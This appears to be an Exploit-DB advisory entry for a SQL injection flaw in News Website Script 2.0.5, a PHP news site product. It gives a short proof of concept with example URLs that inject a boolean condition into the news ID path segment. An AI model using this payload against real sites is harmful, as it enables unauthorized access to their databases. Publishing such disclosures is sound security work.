News Website Script 2.0.5 - SQL Injection

EDB-ID:

46456

CVE:

N/A




Platform:

PHP

Date:

2019-02-25


# Exploit Title: News Website Script 2.0.5 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
# Tested Version: 2.0.5
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/index.php/show/news/11 [SQL]/

# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri